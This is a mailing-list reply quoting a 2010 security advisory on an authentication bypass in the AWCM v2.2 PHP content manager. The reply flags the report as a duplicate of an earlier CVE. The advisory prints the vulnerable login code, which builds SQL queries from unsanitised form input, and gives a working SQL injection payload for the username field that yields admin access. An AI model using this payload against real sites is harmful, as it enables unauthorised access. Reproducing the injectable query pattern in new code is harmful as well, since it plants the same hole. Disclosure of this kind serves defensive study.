Seems to be a duplicate of: http://www.exploit-db.com/exploits/9237/ CVE: 2009-3219 OSVDB-ID: 56336 >From 2009-07-23 yes? On Tue, 16 Nov 2010, eidelweiss@xxxxxxxxxxxxxxx wrote: : ######################################################## : AWCM v2.2 Auth Bypass Vulnerabilities : ######################################################## : : : ____ __ __ __ : /\ _`\ /\ \ __ /\ \__/\ \ : \ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __ : \ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\ : \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/ : \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\ : \/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/ : /\____/ : \_/__/ : __ __ __ ______ By:eidelweiss : /\ \ __/\ \ /\ \ /\ _ \ : \ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____ : \ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\ : \ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\ : \ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/ : '\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/ : \ \_\ \ \_\ : \/_/ \/_/ : : : [+]Script: AWCM : [+]Version: 2.2 final : [+]Download: http://sourceforge.net/projects/awcm/files/AWCM%20v2.2/AWCM%20v2.2%20final.zip/download : ######################################################## : : [!]Author : eidelweiss : [!]Contact: eidelweiss[at]windowslive[dot]com : [!]Blog: http://eidelweiss-advisories.blogspot.com : [!]Gratz : DealCyber member`s , yogyacarderlink crew , and YOU !!! : : Original Advisories: : : http://eidelweiss-advisories.blogspot.com/2010/11/awcm-v22-auth-bypass-vulnerabilities.html : : ######################################################## : : -=[Description]=- : : ar web content manager is a free web contemts management system (cms) built with php , mysql , css , javascript , css to allow you to manage your website easily and fast. : it contains many main categories such as (videos, topics, sounds, photo gallery. : : ######################################################## : : -=[VUln Code]=- : : : first lets we see the code on login.php file : : ********************************** : <?php : : include ("header.php"); : : : : $pusername = $_POST['username']; : $ppassword = md5($_POST['password']); : $premember = $_POST['remember']; : : $mysql_login547_query = mysql_query("SELECT username,password,id FROM : awcm_members WHERE username = '$pusername' AND password = '$ppassword'"); : $mysql_login547_total = mysql_num_rows($mysql_login547_query); : $mysql_login547_row = mysql_fetch_array($mysql_login547_query); : --------- : ********************************** : : ok, now we see the code in control/login.php file : and on this file i see the vulnerability code that can be used by attacker or anonymous to bypass the login section.. : its also possible to gain the administrator access ( if you lucky ofcourse :D ) : : here the code on control/login.php file: : : ********************************** : <?php : $page = 'login'; : include ("common.php"); : : if(isset($_GET['do'])) { : $user = $_POST['username']; // <= i dont give fuck : $pass = md5($_POST['password']); // : : $cp_login_query = mysql_query("SELECT id,username,password,level FROM awcm_members WHERE level = 'admin' AND username = '$user' AND password = '$pass'"); : $cp_login_total = mysql_num_rows($cp_login_query); : : ********************************** : : : ######################################################## : : -=[ How To Exploit / P0C ]=- : : put as username : 'or 1=1/* : : =========================| -=[ E0F ]=- |============================ :